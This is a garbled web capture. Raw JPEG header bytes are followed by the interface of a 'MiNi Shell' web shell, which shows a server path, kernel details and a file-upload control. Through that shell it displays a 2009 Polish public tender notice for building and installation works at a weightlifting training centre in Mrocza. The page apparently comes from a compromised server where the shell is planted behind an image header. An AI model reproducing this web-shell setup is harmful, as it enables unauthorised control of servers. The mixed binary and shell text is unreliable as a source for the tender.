JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090210/

Linux eb5096292c53 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090210/23648-N-2009.html

<p class="kh_header"><b>Mrocza: Roboty budowlane - instalacyjne dla realizowanego przez Zamawiającego zadania p.n. Budowa kompleksu internatowo - socjalnego wraz ze stołówką dla potrzeb ośrodka szkolenia polskiego związku podnoszenia ciężarów w Mroczy.</b><br>
<b>Numer ogłoszenia: 23648 - 2009; data zamieszczenia: 10.02.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zakład Robót Publicznych , ul. Łąkowa 7, 89-115 Mrocza, woj. kujawsko-pomorskie, tel. 052 3856357.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mrocza-zrp.com</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Roboty budowlane - instalacyjne dla realizowanego przez Zamawiającego zadania p.n. Budowa kompleksu internatowo - socjalnego wraz ze stołówką dla potrzeb ośrodka szkolenia polskiego związku podnoszenia ciężarów w Mroczy..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1.Roboty budowlane
Część  I - CPV 45421000-4 Montaż stolarki okiennej i drzwiowej w budynku internatu.
Część II - CPV 45321000-3 Elewacja budynku internatu.
2.Roboty instalacyjne
Część III - CPV 45331110-0, 45310000-3 Technologia kotłowni olejowej wraz z instalacją elektryczną i akpia w kotłowni
Część IV - 45331100-7 Instalacja c.o.
Część V  - CPV 45331210-1 Wentylacja 
Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego dla poszczególnych części niniejszego postępowania zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres.
3.Dostawy materiałów
Cześć VI - CPV 44111000-1, 44111200-3, 44111100-2, 14210000-6 Materiały ogólnobudowlane-wg zał. nr 1 do SIWZ
Część VII - CPV 44114000-2 Beton-wg zał. nr 2 do SIWZ
Część VIII - CPV 1462200-7 Stal budowlana-wg zał. nr 3 do SIWZ
Część IX 31500000-1, 31600000-2, 31211000-8, 31211100-9, 31213100-3, 31300000-9 Instalacje wewnętrzne elektryczne i teletechniczne-wg zał. nr 4 do SIWZ
Część X 31216000-3, 31216100-4, 31214300-2, 31300000-9 Instalacje elektryczne (zewnętrzne)-wg zał. nr 5 do SIWZ
Część XI - CPV 44410000-7, 44411000-4, 44411300-7, 44411710-4, 44163100-1 Instalacja wewnętrzna wodno - kanalizacyjna-wg zał. nr 6 do SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3, 45.42.10.00-4, 45.33.12.10-1, 45.33.11.00-7, 45.33.11.10-0.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 11.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> .</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wymagania - odnośnie  wadium: wymagane  wadium 27 830,00 PLN, w tym:
część  1 -    3 200,00 PLN 		
część  2 -    3 400,00 PLN   	
część  3 -    2 500,00 PLN	
część 4 -     2 600,00 PLN	        
część 5 -     3 100,00 PLN	   
część 6 -     2 400,00 PLN
część  7 -      450,00 PLN 
część  8 -      180,00 PLN
część  9 -   3 600,00 PLN
część  10 - 2 400,00 PLN 
część  11 -  4 000,00 PLN<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> O udzielenie zamówienia mogą ubiegać się oferenci, którzy:
1.Spełniają warunki  określone w art.22 ust. 1.
2.Nie podlegają wykluczeniu na podstawie art. 24 ust. 1 i 2 Ustawy Prawo Zamówień Publicznych.
3.Spełnią warunek dodatkowy: wyrazi  zgodę  na  termin płatności - 30 dni liczony od dnia złożenia  u  Zamawiającego faktury  za  zrealizowane zamówienie  wraz  z  wymaganym  kompletem  dokumentów.  
Zamawiający dokona oceny spełnienia warunków udziału w postępowaniu na podstawie złożonych przez oferenta oświadczeń i dokumentów..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> CZĘŚĆ OGÓLNA - dotyczy wszystkich części zamówienia 
1.Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do  ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu  do rejestru lub zgłoszenia do ewidencji działalności gospodarczej, wystawionego  nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert 
2.Aktualne  zaświadczenia właściwego naczelnika  urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub  Kasy  Rolniczego  Ubezpieczenia  Społecznego, potwierdzających odpowiednio, że dostawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne lub społeczne, lub zaświadczeń, że uzyskał  przewidziane  prawem  zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności  lub wstrzymanie w całości wykonan   ia decyzji  właściwego organu  - wystawionych  nie wcześniej niż 3  miesiące  przed upływem terminu składania ofert .
3.Oświadczenie o spełnieniu  warunków określonych w art.22 ust. 1 i art. 24 ust.1 i 2 Ustawy - Prawo Zamówień Publicznych - załącznik  nr  8 i 9.
4.Pełnomocnictwo do podpisania oferty i załączników, o ile prawo reprezentowania Wykonawcy nie wynika z innych dokumentów złożonych wraz z ofertą. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia do oferty należy dołączyć pełnomocnictwo podpisane przez uprawnionych przedstawicieli pozostałych Wykonawców, upoważniające jednego z Wykonawców  do reprezentowania pozostałych.
5.Wypełniony  ,,Druk  oferta,, -  załącznik  nr 7 do SIWZ.  
6.Oświadczenie o terminie płatności-  załącznik  nr 10 do SIWZ.
7.Dowód wniesienia wadium.
8.Oświadczenie o warunkach gwarancji z podaniem okresu gwarancji - minimum 36 m-cy - załącznik nr 12 do   SIWZ.
9.Aktualną informację  z Krajowego Rejestru Karnego w zakresie  określonym  w  art. 24  ust. 1 pkt 4-8 ustawy, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert
10.Aktualną  informację  z  Krajowego  Rejestru  Karnego  w  zakresie  określonym  w  art.24 ust.1 pkt 9 ustawy, wystawioną  nie  wcześniej  niż  6  miesięcy  przed  upływem terminu składania  ofert.
11.Polisa  lub  inny  dokument  ubezpieczenia  potwierdzający,  że  wykonawca  jest  ubezpieczony  od  odpowiedzialności  cywilnej  w  zakresie  prowadzonej  działalności gospodarczej.
12.Wykaz części zamówienia, które wykonawca zamierza powierzyć podwykonawcom z wykorzystaniem wzoru - załącznik nr 13. 

Dotyczy części I - V zamówienia
13.Wykaz osób, którymi dysponuje lub będzie dysponował wykonawca i które będą uczestniczyć w wykonywaniu zamówienia - załącznik nr 14  do SIWZ wraz z dokumentami potwierdzającymi ich kwalifikacje zawodowe (dot. kadry kierowniczej). Jeżeli wykonawca w chwili złożenia oferty nie dysponuje osobami zdolnymi do wykonania zamówienia zobowiązany jest złożyć pisemne zobowiązanie innych podmiotów do udostępnienia osób zdolnych do wykonania zamówienia  
14.Wykaz wykonanych w okresie ostatnich pięciu  lat robót  budowlanych a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, popartych referencjami (minimum 5 listów referencyjnych) odpowiadających swoim rodzajem i  wartością robotom budowlanym stanowiącym przedmiot zamówienia, z podaniem ich  wartości, przedmiotu oraz  daty  i  miejsca  wykonania  oraz  załączeniem dokumentów  potwierdzających, że  roboty  te  zostały  wykonane  należycie.
15.Informacje  na  temat  przeciętnej  liczby  zatrudnionych  pracowników oraz liczebności  personelu  kierowniczego, w  okresie  ostatnich  trzech  lat, a w przypadku gdy okres  prowadzenia  działalności  jest  krótszy  - w  tym  okresie.
16.Kosztorysy ofertowe - opracowane na podstawie przedmiarów robót i dokumentacji technicznej.
Dotyczy części VI - XI zamówienia
17.Wypełnione formularze  cenowe  dla  odpowiednich  części  zamówienia  wg -  załączników   nr  1 - 6 do  SIWZ.
18.Oświadczenie, że  zastosowane  w  ofercie  asortymenty  posiadają  wszelkie  niezbędne  atesty, aprobaty  i  świadectwa oraz zobowiązanie się Wykonawcy do  ich  przekazywania Zamawiającemu   łącznie  z  dostarczanym asortymentem - załącznik nr 11 do SIWZ.

W przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia:
- dokumenty wymieniony w pkt 1-3 oraz pkt 9-11 winny być przedłożone przez każdego Wykonawcę,
- dokument wymieniony w pkt 5-8, 16 - 18 oraz 12 winien być złożony w imieniu wszystkich Wykonawców,
- wykazy oraz informacje wymienione w pkt 13 - 15 może złożyć tylko Wykonawca, który spełnia warunek lub pełnomocnik działający w imieniu Wykonawców występujących wspólnie. 
- Wykonawcy wspólnie ubiegający się o zamówienie winni ustanowić pełnomocnika do reprezentowania ich w postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie niniejszego zamówienia.

Dokumenty o których mowa mogą być przedstawione w formie oryginału lub kserokopii  poświadczonej za zgodność z oryginałem  przez Wykonawcę .
Zamawiający może żądać przedstawienia oryginału lub notarialnie potwierdzonej kopii dokumentu wyłącznie wtedy, gdy przedstawiona przez oferenta  kserokopia dokumentu jest nieczytelna lub budzi wątpliwości co do jej prawdziwości, a zamawiający nie może sprawdzić jej prawdziwości w inny sposób. 
Złożenie przez oferenta fałszywych lub stwierdzających nieprawdę dokumentów lub nierzetelnych oświadczeń mających istotne znaczenie dla prowadzonego postępowania jest karalne..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.mrocza.pl zakładka: Zakład  Robót.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Zakład Robót Publicznych, ul. Łąkowa 7, 89-115 Mrocza.</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 09.03.2009 godzina 13:00, miejsce: zakład Robót Publicznych, ul. Łąkowa 7, Mrocza, sekretariat.</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Montaż stolarki okiennej i drzwiowej w budynku internatu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne i przedmiar pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres/adres e-mail..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.42.10.00-4.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Elewacja budynku internatu..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne i przedmiar pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres/adres e-mail..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.32.10.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Technologia kotłowni olejowej wraz z instalacją   
elektryczną i akpia w kotłowni.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne i przedmiary pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres/adres e-mail..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.10-0, 45.31.00.00-3.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Instalacja c.o..</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne i przedmiar pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres/adres e-mail..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.11.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 5 <b>NAZWA:</b> Wentylacja.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Szczegółowy zakres robót niezbędny do sporządzenia kosztorysu ofertowego zawierają dokumentacje techniczne i przedmiary stanowiące załączniki do SIWZ. Dokumentacje techniczne i przedmiar pozostają do wglądu w siedzibie Zamawiającego, bądź na wniosek Wykonawcy zostaną przesłane pod wskazany adres/adres e-mail..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 45.33.12.10-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 6 <b>NAZWA:</b> Materiały ogólnobudowlane.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Materiały ogólnobudowlane - wg załącznika nr 1 do SIWZ





m2
430
17
Papa termozgrzewalna nawierzchniowa modyfikowana SBS
m2
430
18
Płyty z wełny mineralnej gr. 18 cm
m2
390,0
19
Piasek do zapraw ( różne frakcje)
m3
100,0
20
Cement
t
15,0
21
Wapno
t
5,0
22
Śruby stalowe z  nakrętką i podkładką  rózne  rodzaje,            śr. M8-M12 dł. do 50 mm
kg
9
23
Kołki rozporowe plastikowe  ( różne rodzaje )
Szt.
885,0
24
Płytki posadzkowe gress 30x30  olejoodporne ( różne kolory )
m2
90
25
Płytki posadzkowe gress 30x30   ( różne kolory )
m2
180
26
Płytki  ceramiczne ścienne 20x25  (różne kolory) 
m2
250
27
Zaprawa klejowa do płytek CM11 lub równoważna
kg
3800
28
Fuga elastyczna (różne kolory)
kg
50
29
Fuga do płytek ceramicznych ( różne kolory )
kg
220
30
Pustak zewnętrzny do komina ceramicznego typu ,,Schiedel Rondo Plus,, lub równoważnego fi180 38x54x33 
szt
30
31
Rura ceramiczna do komina ceramicznego typu ,,Schiedel Rondo Plus,, lub równoważnego fi180 wys.33
szt
30
32
Rura ceramiczna z przyłączem spalin do komina ceramicznego typu ,,Schiedel Rondo Plus,, lub równoważnego fi180 wys.66, kąt przyłącza -A
szt
1
33
Rura ceramiczna z przyłączem drzwiczek do komina ceramicznego typu ,,Schiedel Rondo Plus,, lub równoważnego fi180 wys.66, wym.wew. ramy  13/26cm
szt
1
34
Pakiet  podstawowy  do  komina ceramicznego typu ,,Schiedel Rondo Plus,, lub równoważnego fi180
szt
1
35
Anemostaty kołowe typ D o śr. do 160 mm kompletne 
Szt.
31.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.10.00-1, 44.11.12.00-3, 44.11.11.00-2, 14.21.00.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 60.</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 7 <b>NAZWA:</b> Beton.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wg załącznika nr 2 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.11.40.00-2.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 8 <b>NAZWA:</b> Stal budowlana.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wg załącznika nr 3 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 14.62.20.00-7.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 9 <b>NAZWA:</b> Instalacje wewnętrzne elektryczne i teletechniczne.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wg załacznika nr 4 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.50.00.00-1, 31.60.00.00-2, 31.21.10.00-8, 31.21.11.00-9, 31.21.31.00-3, 31.30.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 10 <b>NAZWA:</b> Instalacje elektryczne (zewnętrzne).</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wg załącznika nr 5 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 31.21.60.00-3, 31.21.61.00-4, 31.21.43.00-2, 31.30.00.00-9.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 11 <b>NAZWA:</b> Instalacja wewnętrzna wodno - kanalizacyjna.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> wg załącznika nr 6 do SIWZ.</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 44.41.00.00-7, 44.41.10.00-4, 44.41.13.00-7, 44.41.17.10-4, 44.16.31.00-1.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 90.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com